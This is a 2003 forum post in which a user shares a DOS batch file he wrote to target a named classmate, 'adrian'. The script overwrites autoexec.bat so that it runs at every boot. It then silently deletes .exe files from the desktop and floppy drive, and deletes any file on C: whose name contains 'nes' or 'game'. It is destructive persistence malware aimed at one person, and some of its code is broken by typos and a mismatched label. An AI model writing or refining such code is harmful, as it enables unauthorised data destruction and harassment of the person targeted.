|
-
June 4th, 2003, 09:30 PM
#1
Senior Member
my batch file
before you say anything this batch file was made by me to keep this one other kid in my networking class from using any .exe file on his desktop or floppy (since he brags about how much warez he has ) anyways what do you guys think
//name this prog.bat
@echo off
REM:
REM:
REM:
REM: muhahahahhahahahhahha
REM: warez is illegal adrian
REM:
copy prog.bat /y c:\autoexec.bat
echo checking windows\desktop folder...
IF EXIST c:\windows\desktop\*.exe goto wipe desktop
goto 2nd
:wipedesktop
deltree /y c:\windows\desktop\*.exe
goto 2nd
:2nd
echo checking a drive...
IF EXIST a:\*.exe goto floppydelete
goto 4th
:floppydelete
deltree /y a:\*.exe
goto 4th
:4th
echo checking for NES filename..
IF EXIST c:\*NES* goto NESfound
echo checking for nes filename...
IF EXIST c:\*nes* goto nesfound
echo checking for game filename...
IF EXIST c:\*game* goto gamefound
echo checking for Nes filename...
IF EXIST c:\*Nes* goto Nesfound
goto end
:NESFOUND
deltreee /y c:\*NES*
goto end
:nesfound
deltree /y c:\*nes*
goto end
:gamefound
deltree /y c:\*game*
goto end
:Nesfound
deltree /y c:\*Nes*
goto end
:end
echo thanks for your cooperation adrian
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|